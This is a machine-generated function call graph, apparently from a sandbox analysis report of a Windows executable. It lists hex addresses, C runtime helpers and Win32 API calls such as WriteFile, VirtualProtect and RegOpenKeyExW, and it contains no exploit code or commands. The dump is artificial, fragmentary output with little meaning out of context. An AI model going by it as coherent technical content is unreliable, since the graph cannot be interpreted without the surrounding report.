40b11c 94474->94477 94480 40f82f __lseeki64_nolock 49 API calls 94474->94480 94478 407bda __set_osfhnd 47 API calls 94475->94478 94479 40b099 94476->94479 94481 413bf2 __stbuf 47 API calls 94477->94481 94482 40b0ee 94478->94482 94483 406e10 __cftog_l 8 API calls 94479->94483 94480->94477 94484 40b12a 94481->94484 94485 407c0e __cftog_l 47 API calls 94482->94485 94483->94500 94487 40b44b 94484->94487 94492 407a0d ____lc_codepage_func 47 API calls 94484->94492 94486 40b0f5 94485->94486 94488 406e10 __cftog_l 8 API calls 94486->94488 94489 40b463 94487->94489 94490 40b7b8 WriteFile 94487->94490 94488->94500 94493 40b55a 94489->94493 94498 40b479 94489->94498 94491 40b7e1 GetLastError 94490->94491 94502 40b410 94490->94502 94491->94502 94495 40b150 GetConsoleMode 94492->94495 94504 40b663 94493->94504 94507 40b565 94493->94507 94494 40b81b 94494->94500 94501 407c0e __cftog_l 47 API calls 94494->94501 94495->94487 94496 40b189 94495->94496 94496->94487 94497 40b199 GetConsoleCP 94496->94497 94497->94502 94525 40b1c2 94497->94525 94498->94494 94499 40b4e9 WriteFile 94498->94499 94499->94491 94503 40b526 94499->94503 94500->94470 94505 40b843 94501->94505 94502->94494 94502->94500 94506 40b7f7 94502->94506 94503->94498 94503->94502 94515 40b555 94503->94515 94504->94494 94508 40b6d8 WideCharToMultiByte 94504->94508 94509 407bda __set_osfhnd 47 API calls 94505->94509 94510 40b812 94506->94510 94511 40b7fe 94506->94511 94507->94494 94512 40b5de WriteFile 94507->94512 94508->94491 94523 40b71f 94508->94523 94509->94500 94513 407bed __dosmaperr 47 API calls 94510->94513 94516 407c0e __cftog_l 47 API calls 94511->94516 94512->94491 94514 40b62d 94512->94514 94513->94500 94514->94502 94514->94507 94514->94515 94515->94502 94518 40b803 94516->94518 94517 40b727 WriteFile 94520 40b77a GetLastError 94517->94520 94517->94523 94521 407bda __set_osfhnd 47 API calls 94518->94521 94519 401688 __chsize_nolock 57 API calls 94519->94525 94520->94523 94521->94500 94522 4140f7 59 API calls __chsize_nolock 94522->94525 94523->94502 94523->94504 94523->94515 94523->94517 94524 415884 WriteConsoleW CreateFileW __chsize_nolock 94527 40b2f6 94524->94527 94525->94502 94525->94519 94525->94522 94526 40b28f WideCharToMultiByte 94525->94526 94525->94527 94526->94502 94528 40b2ca WriteFile 94526->94528 94527->94491 94527->94502 94527->94524 94527->94525 94529 40b321 WriteFile 94527->94529 94528->94491 94528->94527 94529->94491 94529->94527 94530->94438 94531->94443 94532->94454 94533->94453 94534->94443 94535->94441 94536->94446 94537->94443 94538->94404 94539->94406 94562 40aba4 94540->94562 94542 40eb00 94575 40ab1e 48 API calls 2 library calls 94542->94575 94544 40eaaa 94544->94542 94545 40eade 94544->94545 94547 40aba4 __close_nolock 47 API calls 94544->94547 94545->94542 94548 40aba4 __close_nolock 47 API calls 94545->94548 94546 40eb08 94550 40eb2a 94546->94550 94576 407bed 47 API calls 3 library calls 94546->94576 94551 40ead5 94547->94551 94549 40eaea CloseHandle 94548->94549 94549->94542 94552 40eaf6 GetLastError 94549->94552 94550->94428 94554 40aba4 __close_nolock 47 API calls 94551->94554 94552->94542 94554->94545 94555->94413 94556->94426 94557->94428 94558->94426 94559->94417 94560->94420 94561->94426 94563 40abc4 94562->94563 94564 40abaf 94562->94564 94566 407bda __set_osfhnd 47 API calls 94563->94566 94568 40abe9 94563->94568 94565 407bda __set_osfhnd 47 API calls 94564->94565 94567 40abb4 94565->94567 94569 40abf3 94566->94569 94570 407c0e __cftog_l 47 API calls 94567->94570 94568->94544 94571 407c0e __cftog_l 47 API calls 94569->94571 94573 40abbc 94570->94573 94572 40abfb 94571->94572 94574 406e10 __cftog_l 8 API calls 94572->94574 94573->94544 94574->94573 94575->94546 94576->94550 94577->94017 94578->94026 94579->94026 94580->94027 94581->94040 94582->94042 94583->94038 94584->94047 94585->94049 94586->94066 94587->94060 94589 40f8a0 __ftell_nolock 94588->94589 94590 3e40b4 GetLongPathNameW 94589->94590 94591 3e6a63 48 API calls 94590->94591 94592 3e40dc 94591->94592 94593 3e49a0 94592->94593 94594 3ed7f7 48 API calls 94593->94594 94595 3e49b2 94594->94595 94596 3e660f 49 API calls 94595->94596 94597 3e49bd 94596->94597 94598 3e49c8 94597->94598 94602 452e35 94597->94602 94599 3e64cf 48 API calls 94598->94599 94601 3e49d4 94599->94601 94640 3e28a6 94601->94640 94604 452e4f 94602->94604 94646 3fd35e 60 API calls 94602->94646 94605 3e49e7 Mailbox 94605->93890 94607 3e41a9 136 API calls 94606->94607 94608 3e415e 94607->94608 94609 453489 94608->94609 94611 3e41a9 136 API calls 94608->94611 94610 42c396 122 API calls 94609->94610 94612 45349e 94610->94612 94613 3e4172 94611->94613 94614 4534a2 94612->94614 94615 4534bf 94612->94615 94613->94609 94616 3e417a 94613->94616 94617 3e4252 84 API calls 94614->94617 94618 3ff4ea 48 API calls 94615->94618 94619 3e4186 94616->94619 94620 4534aa 94616->94620 94617->94620 94637 453504 Mailbox 94618->94637 94647 3ec833 94619->94647 94749 426b49 87 API calls _wprintf 94620->94749 94623 4534b8 94623->94615 94625 4536b4 94626 401c9d _free 47 API calls 94625->94626 94627 4536bc 94626->94627 94628 3e4252 84 API calls 94627->94628 94633 4536c5 94628->94633 94632 401c9d _free 47 API calls 94632->94633 94633->94632 94635 3e4252 84 API calls 94633->94635 94753 4225b5 86 API calls 4 library calls 94633->94753 94635->94633 94636 3ece19 48 API calls 94636->94637 94637->94625 94637->94633 94637->94636 94735 3eba85 94637->94735 94743 3e4dd9 94637->94743 94750 422551 48 API calls ___crtGetEnvironmentStringsW 94637->94750 94751 422472 60 API calls 2 library calls 94637->94751 94752 429c12 48 API calls 94637->94752 94641 3e28b8 94640->94641 94645 3e28d7 ___crtGetEnvironmentStringsW 94640->94645 94643 3ff4ea 48 API calls 94641->94643 94642 3ff4ea 48 API calls 94644 3e28ee 94642->94644 94643->94645 94644->94605 94645->94642 94646->94602 94648 3ec843 __ftell_nolock 94647->94648 94649 453095 94648->94649 94650 3ec860 94648->94650 94778 4225b5 86 API calls 4 library calls 94649->94778 94759 3e48ba 49 API calls 94650->94759 94653 4530a8 94779 4225b5 86 API calls 4 library calls 94653->94779 94654 3ec882 94760 3e4550 56 API calls 94654->94760 94656 3ec897 94656->94653 94657 3ec89f 94656->94657 94659 3ed7f7 48 API calls 94657->94659 94661 3ec8ab 94659->94661 94660 4530c4 94663 3ec90c 94660->94663 94761 3fe968 49 API calls __ftell_nolock 94661->94761 94664 4530d7 94663->94664 94665 3ec91a 94663->94665 94667 3e4907 CloseHandle 94664->94667 94764 401dfc 94665->94764 94666 3ec8b7 94668 3ed7f7 48 API calls 94666->94668 94670 4530e3 94667->94670 94671 3ec8c3 94668->94671 94672 3e41a9 136 API calls 94670->94672 94673 3e660f 49 API calls 94671->94673 94674 45310d 94672->94674 94675 3ec8d1 94673->94675 94677 453136 94674->94677 94680 42c396 122 API calls 94674->94680 94762 3feb66 SetFilePointerEx ReadFile 94675->94762 94676 3ec943 _wcscat _wcscpy 94679 3ec96d SetCurrentDirectoryW 94676->94679 94780 4225b5 86 API calls 4 library calls 94677->94780 94683 3ff4ea 48 API calls 94679->94683 94684 453129 94680->94684 94681 3ec8fd 94763 3e46ce SetFilePointerEx SetFilePointerEx 94681->94763 94687 3ec988 94683->94687 94688 453131 94684->94688 94689 453152 94684->94689 94686 45314d 94718 3ecad1 Mailbox 94686->94718 94690 3e47b7 48 API calls 94687->94690 94691 3e4252 84 API calls 94688->94691 94692 3e4252 84 API calls 94689->94692 94722 3ec993 Mailbox __NMSG_WRITE 94690->94722 94691->94677 94693 453157 94692->94693 94694 3ff4ea 48 API calls 94693->94694 94701 453194 94694->94701 94695 3eca9d 94774 3e4907 94695->94774 94699 3e3d98 94699->93756 94699->93764 94700 3ecaa9 SetCurrentDirectoryW 94700->94718 94703 3eba85 48 API calls 94701->94703 94704 4531dd Mailbox 94703->94704 94706 4533ce 94704->94706 94721 3eba85 48 API calls 94704->94721 94727 3ece19 48 API calls 94704->94727 94730 453420 94704->94730 94781 422551 48 API calls ___crtGetEnvironmentStringsW 94704->94781 94782 422472 60 API calls 2 library calls 94704->94782 94783 429c12 48 API calls 94704->94783 94784 3fc682 48 API calls 94704->94784 94785 429b72 48 API calls 94706->94785 94707 453467 94789 4225b5 86 API calls 4 library calls 94707->94789 94710 453480 94710->94695 94712 4533f0 94786 4429e8 48 API calls ___crtGetEnvironmentStringsW 94712->94786 94714 4533fd 94717 401c9d _free 47 API calls 94714->94717 94716 45345f 94788 42240b 48 API calls 3 library calls 94716->94788 94717->94718 94754 3e48dd 94718->94754 94719 3ece19 48 API calls 94719->94722 94721->94704 94722->94695 94722->94707 94722->94716 94722->94719 94767 3eb337 56 API calls _wcscpy 94722->94767 94768 3fc258 GetStringTypeW 94722->94768 94769 3ecb93 59 API calls __wcsnicmp 94722->94769 94770 3ecb5a GetStringTypeW __NMSG_WRITE 94722->94770 94771 4016d0 GetStringTypeW __towlower_l 94722->94771 94772 3ecc24 162 API calls 3 library calls 94722->94772 94773 3fc682 48 API calls 94722->94773 94727->94704 94787 4225b5 86 API calls 4 library calls 94730->94787 94732 453439 94733 401c9d _free 47 API calls 94732->94733 94734 45344c 94733->94734 94734->94718 94736 3ebb25 94735->94736 94739 3eba98 ___crtGetEnvironmentStringsW 94735->94739 94738 3ff4ea 48 API calls 94736->94738 94737 3ff4ea 48 API calls 94741 3eba9f 94737->94741 94738->94739 94739->94737 94740 3ebac8 94740->94637 94741->94740 94742 3ff4ea 48 API calls 94741->94742 94742->94740 94744 3e4dec 94743->94744 94747 3e4e9a 94743->94747 94745 3ff4ea 48 API calls 94744->94745 94748 3e4e1e 94744->94748 94745->94748 94746 3ff4ea 48 API calls 94746->94748 94747->94637 94748->94746 94748->94747 94749->94623 94750->94637 94751->94637 94752->94637 94753->94633 94755 3e4907 CloseHandle 94754->94755 94756 3e48e5 Mailbox 94755->94756 94757 3e4907 CloseHandle 94756->94757 94758 3e48fc 94757->94758 94758->94699 94759->94654 94760->94656 94761->94666 94762->94681 94763->94663 94790 401e46 94764->94790 94767->94722 94768->94722 94769->94722 94770->94722 94771->94722 94772->94722 94773->94722 94775 3e4920 94774->94775 94776 3e4911 94774->94776 94775->94776 94777 3e4925 CloseHandle 94775->94777 94776->94700 94777->94776 94778->94653 94779->94660 94780->94686 94781->94704 94782->94704 94783->94704 94784->94704 94785->94712 94786->94714 94787->94732 94788->94707 94789->94710 94791 401e61 94790->94791 94795 401e55 94790->94795 94814 407c0e 47 API calls __getptd_noexit 94791->94814 94793 402019 94798 401e41 94793->94798 94815 406e10 8 API calls __cftog_l 94793->94815 94795->94791 94800 401ed4 94795->94800 94809 409d6b 47 API calls __cftog_l 94795->94809 94797 401fa0 94797->94791 94797->94798 94801 401fb0 94797->94801 94798->94676 94799 401f5f 94799->94791 94802 401f7b 94799->94802 94811 409d6b 47 API calls __cftog_l 94799->94811 94800->94791 94808 401f41 94800->94808 94810 409d6b 47 API calls __cftog_l 94800->94810 94813 409d6b 47 API calls __cftog_l 94801->94813 94802->94791 94802->94798 94804 401f91 94802->94804 94812 409d6b 47 API calls __cftog_l 94804->94812 94808->94797 94808->94799 94809->94800 94810->94808 94811->94802 94812->94798 94813->94798 94814->94793 94815->94798 94817 3e4c8b 94816->94817 94818 3e4d94 94816->94818 94817->94818 94819 3ff4ea 48 API calls 94817->94819 94818->93896 94820 3e4cb2 94819->94820 94821 3ff4ea 48 API calls 94820->94821 94822 3e4d22 94821->94822 94822->94818 94824 3e4dd9 48 API calls 94822->94824 94826 3eba85 48 API calls 94822->94826 94829 3eb470 91 API calls 2 library calls 94822->94829 94830 429af1 48 API calls 94822->94830 94824->94822 94826->94822 94827->93899 94828->93901 94829->94822 94830->94822 94832 3e403c LoadImageW 94831->94832 94833 45418d EnumResourceNamesW 94831->94833 94834 3e3ee1 RegisterClassExW 94832->94834 94833->94834 94835 3e3f53 7 API calls 94834->94835 94835->93915 94837 3ef130 94836->94837 94846 3ef199 94837->94846 94938 3efe30 346 API calls __cinit 94837->94938 94838 3ef595 94847 3ed7f7 48 API calls 94838->94847 94887 3ef431 Mailbox 94838->94887 94840 3ef3f2 94844 3ef418 94840->94844 94943 429af1 48 API calls 94840->94943 94841 4587c8 94942 42cc5c 86 API calls 4 library calls 94841->94942 94842 458728 94842->94846 94939 42cc5c 86 API calls 4 library calls 94842->94939 94843 3efe30 346 API calls 94843->94887 94855 458b1b 94844->94855 94873 3ef6aa 94844->94873 94844->94887 94846->94838 94850 3ed7f7 48 API calls 94846->94850 94880 3ef229 94846->94880 94889 3ef3dd 94846->94889 94849 4587a3 94847->94849 94941 400f0a 52 API calls __cinit 94849->94941 94851 458772 94850->94851 94940 400f0a 52 API calls __cinit 94851->94940 94853 3ef770 94862 458a45 94853->94862 94879 3ef77a 94853->94879 94865 458b2c 94855->94865 94866 458bcf 94855->94866 94856 3ed6e9 55 API calls 94856->94887 94859 42cc5c 86 API calls 94859->94887 94860 458b7e 94953 43e40a 346 API calls Mailbox 94860->94953 94861 458c53 94958 42cc5c 86 API calls 4 library calls 94861->94958 94950 3fc1af 48 API calls 94862->94950 94863 458810 94944 43eef8 346 API calls 94863->94944 94952 43f5ee 346 API calls 94865->94952 94955 42cc5c 86 API calls 4 library calls 94866->94955 94867 458beb 94956 43bdbd 346 API calls Mailbox 94867->94956 94872 3f1b90 48 API calls 94872->94887 94873->94853 94881 3efce0 94873->94881 94873->94887 94900 3ef537 Mailbox 94873->94900 94936 3efe30 346 API calls __cinit 94873->94936 94875 3f1b90 48 API calls 94875->94887 94878 458c00 94878->94900 94957 42cc5c 86 API calls 4 library calls 94878->94957 94879->94872 94880->94838 94880->94844 94880->94887 94880->94889 94881->94900 94954 42cc5c 86 API calls 4 library calls 94881->94954 94882 458823 94882->94844 94884 45884b 94882->94884 94945 43ccdc 48 API calls 94884->94945 94887->94843 94887->94856 94887->94859 94887->94860 94887->94861 94887->94867 94887->94875 94887->94881 94887->94900 94937 3edd47 48 API calls ___crtGetEnvironmentStringsW 94887->94937 94951 4197ed InterlockedDecrement 94887->94951 94959 3fc1af 48 API calls 94887->94959 94889->94840 94889->94841 94889->94887 94890 458857 94892 458865 94890->94892 94893 4588aa 94890->94893 94946 429b72 48 API calls 94892->94946 94896 4588a0 Mailbox 94893->94896 94947 42a69d 48 API calls 94893->94947 94949 3efe30 346 API calls __cinit 94896->94949 94898 4588e7 94948 3ebc74 48 API calls 94898->94948 94900->93977 94902 3f479f 94901->94902 94903 3f4637 94901->94903 94906 3ece19 48 API calls 94902->94906 94904 456e05 94903->94904 94905 3f4643 94903->94905 95011 43e822 346 API calls Mailbox 94904->95011 95010 3f4300 346 API calls ___crtGetEnvironmentStringsW 94905->95010 94913 3f46e4 Mailbox 94906->94913 94909 456e11 94910 3f4739 Mailbox 94909->94910 95012 42cc5c 86 API calls 4 library calls 94909->95012 94910->93977 94912 3f4659 94912->94909 94912->94910 94912->94913 94916 3e4252 84 API calls 94913->94916 94960 440d1d 94913->94960 94963 426524 94913->94963 94966 42fa0c 94913->94966 95007 440d09 94913->95007 94916->94910 94919->93977 94920->93977 94921->93977 94922->93977 94923->93977 94924->93931 94925->93923 94926->93928 94927->93977 94928->93977 94929->93972 94930->93972 94931->93972 94932->93977 94933->93972 94934->93972 94935->93972 94936->94873 94937->94887 94938->94842 94939->94846 94940->94880 94941->94887 94942->94900 94943->94863 94944->94882 94945->94890 94946->94896 94947->94898 94948->94896 94949->94900 94950->94887 94951->94887 94952->94887 94953->94881 94954->94900 94955->94900 94956->94878 94957->94900 94958->94900 94959->94887 95013 43f8ae 94960->95013 94962 440d2d 94962->94910 95099 426ca9 GetFileAttributesW 94963->95099 94967 42fa1c __ftell_nolock 94966->94967 94968 42fa44 94967->94968 95164 3ed286 48 API calls 94967->95164 94970 3e936c 81 API calls 94968->94970 94971 42fa5e 94970->94971 94972 42fa80 94971->94972 94973 42fb68 94971->94973 94983 42fb92 94971->94983 94974 3e936c 81 API calls 94972->94974 94975 3e41a9 136 API calls 94973->94975 94981 42fa8c _wcscpy _wcschr 94974->94981 94976 42fb79 94975->94976 94977 42fb8e 94976->94977 94979 3e41a9 136 API calls 94976->94979 94978 3e936c 81 API calls 94977->94978 94977->94983 94980 42fbc7 94978->94980 94979->94977 94982 401dfc __wsplitpath 47 API calls 94980->94982 94986 42fab0 _wcscat _wcscpy 94981->94986 94990 42fade _wcscat 94981->94990 94987 42fbeb _wcscat _wcscpy 94982->94987 94983->94910 94984 3e936c 81 API calls 94985 42fafc _wcscpy 94984->94985 95165 4272cb GetFileAttributesW 94985->95165 94988 3e936c 81 API calls 94986->94988 94995 3e936c 81 API calls 94987->94995 94988->94990 94990->94984 94991 42fb1c __NMSG_WRITE 94991->94983 94992 3e936c 81 API calls 94991->94992 94993 42fb48 94992->94993 95166 4260dd 77 API calls 4 library calls 94993->95166 94997 42fc82 94995->94997 94996 42fb5c 94996->94983 95103 42690b 94997->95103 94999 42fca2 95000 426524 3 API calls 94999->95000 95001 42fcb1 95000->95001 95002 3e936c 81 API calls 95001->95002 95004 42fce2 95001->95004 95003 42fccb 95002->95003 95109 42bfa4 95003->95109 95006 3e4252 84 API calls 95004->95006 95006->94983 95008 43f8ae 129 API calls 95007->95008 95009 440d19 95008->95009 95009->94910 95010->94912 95011->94909 95012->94910 95014 3e936c 81 API calls 95013->95014 95015 43f8ea 95014->95015 95038 43f92c Mailbox 95015->95038 95049 440567 95015->95049 95017 43fb8b 95018 43fcfa 95017->95018 95022 43fb95 95017->95022 95085 440688 89 API calls Mailbox 95018->95085 95021 43fd07 95021->95022 95024 43fd13 95021->95024 95062 43f70a 95022->95062 95023 3e936c 81 API calls 95030 43f984 Mailbox 95023->95030 95024->95038 95029 43fbc9 95076 3fed18 95029->95076 95030->95017 95030->95023 95030->95038 95080 4429e8 48 API calls ___crtGetEnvironmentStringsW 95030->95080 95081 43fda5 60 API calls 2 library calls 95030->95081 95033 43fbe3 95082 42cc5c 86 API calls 4 library calls 95033->95082 95034 43fbfd 95036 3fc050 48 API calls 95034->95036 95039 43fc14 95036->95039 95037 43fbee GetCurrentProcess TerminateProcess 95037->95034 95038->94962 95041 3f1b90 48 API calls 95039->95041 95048 43fc3e 95039->95048 95040 43fd65 95040->95038 95045 43fd7e FreeLibrary 95040->95045 95042 43fc2d 95041->95042 95083 44040f 105 API calls _free 95042->95083 95044 3f1b90 48 API calls 95044->95048 95045->95038 95048->95040 95048->95044 95084 3edcae 50 API calls Mailbox 95048->95084 95086 44040f 105 API calls _free 95048->95086 95050 3ebdfa 48 API calls 95049->95050 95051 440582 CharLowerBuffW 95050->95051 95087 421f11 95051->95087 95055 3ed7f7 48 API calls 95056 4405bb 95055->95056 95094 3e69e9 48 API calls ___crtGetEnvironmentStringsW 95056->95094 95058 4405d2 95059 3eb18b 48 API calls 95058->95059 95060 4405de Mailbox 95059->95060 95061 44061a Mailbox 95060->95061 95095 43fda5 60 API calls 2 library calls 95060->95095 95061->95030 95063 43f725 95062->95063 95064 43f77a 95062->95064 95065 3ff4ea 48 API calls 95063->95065 95068 440828 95064->95068 95067 43f747 95065->95067 95066 3ff4ea 48 API calls 95066->95067 95067->95064 95067->95066 95069 440a53 Mailbox 95068->95069 95075 44084b _strcat _wcscpy __NMSG_WRITE 95068->95075 95069->95029 95070 3ecf93 58 API calls 95070->95075 95071 3ed286 48 API calls 95071->95075 95072 3e936c 81 API calls 95072->95075 95073 40395c 47 API calls std::exception::_Copy_str 95073->95075 95075->95069 95075->95070 95075->95071 95075->95072 95075->95073 95098 428035 50 API calls __NMSG_WRITE 95075->95098 95077 3fed2d 95076->95077 95078 3fedc5 VirtualProtect 95077->95078 95079 3fed93 95077->95079 95078->95079 95079->95033 95079->95034 95080->95030 95081->95030 95082->95037 95083->95048 95084->95048 95085->95021 95086->95048 95088 421f3b __NMSG_WRITE 95087->95088 95089 421ffa 95088->95089 95090 421f6f 95088->95090 95091 421f79 95088->95091 95089->95091 95097 3fd37a 60 API calls 95089->95097 95090->95091 95096 3fd37a 60 API calls 95090->95096 95091->95055 95091->95060 95094->95058 95095->95061 95096->95090 95097->95089 95098->95075 95100 426529 95099->95100 95101 426cc4 FindFirstFileW 95099->95101 95100->94910 95101->95100 95102 426cd9 FindClose 95101->95102 95102->95100 95104 426918 _wcschr __ftell_nolock 95103->95104 95105 401dfc __wsplitpath 47 API calls 95104->95105 95108 42692e _wcscat _wcscpy 95104->95108 95106 42695d 95105->95106 95107 401dfc __wsplitpath 47 API calls 95106->95107 95107->95108 95108->94999 95110 42bfb1 __ftell_nolock 95109->95110 95111 3ff4ea 48 API calls 95110->95111 95112 42c00e 95111->95112 95113 3e47b7 48 API calls 95112->95113 95114 42c018 95113->95114 95167 42bdb4 95114->95167 95116 42c023 95117 3e4517 83 API calls 95116->95117 95118 42c036 _wcscmp 95117->95118 95119 42c107 95118->95119 95120 42c05a 95118->95120 95188 42c56d 94 API calls 2 library calls 95119->95188 95187 42c56d 94 API calls 2 library calls 95120->95187 95123 42c05f 95124 401dfc __wsplitpath 47 API calls 95123->95124 95126 42c110 95123->95126 95129 42c088 _wcscat _wcscpy 95124->95129 95125 3e44ed 64 API calls 95127 42c12c 95125->95127 95126->95004 95128 3e44ed 64 API calls 95127->95128 95130 42c13c 95128->95130 95132 401dfc __wsplitpath 47 API calls 95129->95132 95131 3e44ed 64 API calls 95130->95131 95133 42c157 95131->95133 95137 42c0d3 _wcscat 95132->95137 95134 3e44ed 64 API calls 95133->95134 95135 42c167 95134->95135 95136 3e44ed 64 API calls 95135->95136 95138 42c182 95136->95138 95137->95125 95137->95126 95139 3e44ed 64 API calls 95138->95139 95140 42c192 95139->95140 95141 3e44ed 64 API calls 95140->95141 95142 42c1a2 95141->95142 95143 3e44ed 64 API calls 95142->95143 95144 42c1b2 95143->95144 95170 42c71a GetTempPathW GetTempFileNameW 95144->95170 95146 42c1be 95147 403499 117 API calls 95146->95147 95158 42c1cf 95147->95158 95148 42c289 95149 4035e4 __fcloseall 83 API calls 95148->95149 95150 42c294 95149->95150 95152 42c29a DeleteFileW 95150->95152 95153 42c2ae 95150->95153 95151 3e44ed 64 API calls 95151->95158 95152->95126 95154 42c342 CopyFileW 95153->95154 95159 42c2b8 95153->95159 95155 42c36a DeleteFileW 95154->95155 95156 42c358 DeleteFileW 95154->95156 95184 42c6d9 CreateFileW 95155->95184 95156->95126 95158->95126 95158->95148 95158->95151 95171 402aae 95158->95171 95189 42b965 118 API calls __fcloseall 95159->95189 95162 42c32d 95162->95155 95163 42c331 DeleteFileW 95162->95163 95163->95126 95164->94968 95165->94991 95166->94996 95190 40344a GetSystemTimeAsFileTime 95167->95190 95169 42bdc3 95169->95116 95170->95146 95172 402aba _raise 95171->95172 95173 402ad4 95172->95173 95174 402aec 95172->95174 95175 402ae4 _raise 95172->95175 95204 407c0e 47 API calls __getptd_noexit 95173->95204 95176 404e1c __lock_file 48 API calls 95174->95176 95175->95158 95178 402af2 95176->95178 95192 402957 95178->95192 95179 402ad9 95205 406e10 8 API calls __cftog_l 95179->95205 95185 42c715 95184->95185 95186 42c6ff SetFileTime CloseHandle 95184->95186 95185->95126 95186->95185 95187->95123 95188->95137 95189->95162 95191 403478 __aulldiv 95190->95191 95191->95169 95193 402984 95192->95193 95195 402966 95192->95195 95206 402b24 LeaveCriticalSection LeaveCriticalSection _fseek 95193->95206 95194 402974 95207 407c0e 47 API calls __getptd_noexit 95194->95207 95195->95193 95195->95194 95203 40299c ___crtGetEnvironmentStringsW 95195->95203 95197 402979 95208 406e10 8 API calls __cftog_l 95197->95208 95200 402c84 __flush 78 API calls 95200->95203 95201 402933 __fclose_nolock 47 API calls 95201->95203 95202 40af61 __flush 78 API calls 95202->95203 95203->95193 95203->95200 95203->95201 95203->95202 95209 408e63 78 API calls 7 library calls 95203->95209 95204->95179 95205->95175 95206->95175 95207->95197 95208->95193 95209->95203 95210 45197b 95215 3fdd94 95210->95215 95214 45198a 95216 3ff4ea 48 API calls 95215->95216 95218 3fdd9c 95216->95218 95217 3fddb0 95222 400f0a 52 API calls __cinit 95217->95222 95218->95217 95223 3fdf3d 95218->95223 95222->95214 95224 3fdda8 95223->95224 95225 3fdf46 95223->95225 95227 3fddc0 95224->95227 95255 400f0a 52 API calls __cinit 95225->95255 95228 3ed7f7 48 API calls 95227->95228 95229 3fddd7 GetVersionExW 95228->95229 95230 3e6a63 48 API calls 95229->95230 95231 3fde1a 95230->95231 95256 3fdfb4 95231->95256 95234 3e6571 48 API calls 95235 3fde2e 95234->95235 95237 4524c8 95235->95237 95260 3fdf77 95235->95260 95239 3fdea4 GetCurrentProcess 95269 3fdf5f LoadLibraryA GetProcAddress 95239->95269 95240 3fdee3 95263 3fe00c 95240->95263 95241 3fdf31 GetSystemInfo 95243 3fdf0e 95241->95243 95247 3fdf1c FreeLibrary 95243->95247 95248 3fdf21 95243->95248 95245 3fdebb 95245->95240 95245->95241 95247->95248 95248->95217 95249 3fdf29 GetSystemInfo 95251 3fdf03 95249->95251 95250 3fdef9 95266 3fdff4 95250->95266 95251->95243 95254 3fdf09 FreeLibrary 95251->95254 95254->95243 95255->95224 95257 3fdfbd 95256->95257 95258 3eb18b 48 API calls 95257->95258 95259 3fde22 95258->95259 95259->95234 95270 3fdf89 95260->95270 95274 3fe01e 95263->95274 95267 3fe00c 2 API calls 95266->95267 95268 3fdf01 GetNativeSystemInfo 95267->95268 95268->95251 95269->95245 95271 3fdea0 95270->95271 95272 3fdf92 LoadLibraryA 95270->95272 95271->95239 95271->95245 95272->95271 95273 3fdfa3 GetProcAddress 95272->95273 95273->95271 95275 3fdef1 95274->95275 95276 3fe027 LoadLibraryA 95274->95276 95275->95249 95275->95250 95276->95275 95277 3fe038 GetProcAddress 95276->95277 95277->95275 95278 4519cb 95283 3e2322 95278->95283 95280 4519d1 95316 400f0a 52 API calls __cinit 95280->95316 95282 4519db 95284 3e2344 95283->95284 95317 3e26df 95284->95317 95289 3ed7f7 48 API calls 95290 3e2384 95289->95290 95291 3ed7f7 48 API calls 95290->95291 95292 3e238e 95291->95292 95293 3ed7f7 48 API calls 95292->95293 95294 3e2398 95293->95294 95295 3ed7f7 48 API calls 95294->95295 95296 3e23de 95295->95296 95297 3ed7f7 48 API calls 95296->95297 95298 3e24c1 95297->95298 95325 3e263f 95298->95325 95302 3e24f1 95303 3ed7f7 48 API calls 95302->95303 95304 3e24fb 95303->95304 95354 3e2745 95304->95354 95306 3e2546 95307 3e2556 GetStdHandle 95306->95307 95308 45501d 95307->95308 95309 3e25b1 95307->95309 95308->95309 95311 455026 95308->95311 95310 3e25b7 CoInitialize 95309->95310 95310->95280 95361 4292d4 53 API calls 95311->95361 95313 45502d 95362 4299f9 CreateThread 95313->95362 95315 455039 CloseHandle 95315->95310 95316->95282 95363 3e2854 95317->95363 95320 3e6a63 48 API calls 95321 3e234a 95320->95321 95322 3e272e 95321->95322 95377 3e27ec 6 API calls 95322->95377 95324 3e237a 95324->95289 95326 3ed7f7 48 API calls 95325->95326 95327 3e264f 95326->95327 95328 3ed7f7 48 API calls 95327->95328 95329 3e2657 95328->95329 95378 3e26a7 95329->95378 95332 3e26a7 48 API calls 95333 3e2667 95332->95333 95334 3ed7f7 48 API calls 95333->95334 95335 3e2672 95334->95335 95336 3ff4ea 48 API calls 95335->95336 95337 3e24cb 95336->95337 95338 3e22a4 95337->95338 95339 3e22b2 95338->95339 95340 3ed7f7 48 API calls 95339->95340 95341 3e22bd 95340->95341 95342 3ed7f7 48 API calls 95341->95342 95343 3e22c8 95342->95343 95344 3ed7f7 48 API calls 95343->95344 95345 3e22d3 95344->95345 95346 3ed7f7 48 API calls 95345->95346 95347 3e22de 95346->95347 95348 3e26a7 48 API calls 95347->95348 95349 3e22e9 95348->95349 95350 3ff4ea 48 API calls 95349->95350 95351 3e22f0 95350->95351 95352 451fe7 95351->95352 95353 3e22f9 RegisterWindowMessageW 95351->95353 95353->95302 95355 455f4d 95354->95355 95356 3e2755 95354->95356 95383 42c942 50 API calls 95355->95383 95357 3ff4ea 48 API calls 95356->95357 95360 3e275d 95357->95360 95359 455f58 95360->95306 95361->95313 95362->95315 95384 4299df 54 API calls 95362->95384 95370 3e2870 95363->95370 95366 3e2870 48 API calls 95367 3e2864 95366->95367 95368 3ed7f7 48 API calls 95367->95368 95369 3e2716 95368->95369 95369->95320 95371 3ed7f7 48 API calls 95370->95371 95372 3e287b 95371->95372 95373 3ed7f7 48 API calls 95372->95373 95374 3e2883 95373->95374 95375 3ed7f7 48 API calls 95374->95375 95376 3e285c 95375->95376 95376->95366 95377->95324 95379 3ed7f7 48 API calls 95378->95379 95380 3e26b0 95379->95380 95381 3ed7f7 48 API calls 95380->95381 95382 3e265f 95381->95382 95382->95332 95383->95359 95385 4519ba 95390 3fc75a 95385->95390 95389 4519c9 95391 3ed7f7 48 API calls 95390->95391 95392 3fc7c8 95391->95392 95398 3fd26c 95392->95398 95394 3fc865 95396 3fc881 95394->95396 95401 3fd1fa 48 API calls ___crtGetEnvironmentStringsW 95394->95401 95397 400f0a 52 API calls __cinit 95396->95397 95397->95389 95402 3fd298 95398->95402 95401->95394 95403 3fd28b 95402->95403 95404 3fd2a5 95402->95404 95403->95394 95404->95403 95405 3fd2ac RegOpenKeyExW 95404->95405 95405->95403 95406 3fd2c6 RegQueryValueExW 95405->95406 95407 3fd2fc RegCloseKey 95406->95407 95408 3fd2e7 95406->95408 95407->95403 95408->95407

                                                                                                              Executed Functions

                                                                                                              Function 0040B043 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                                                                                                              Download Yara Rule

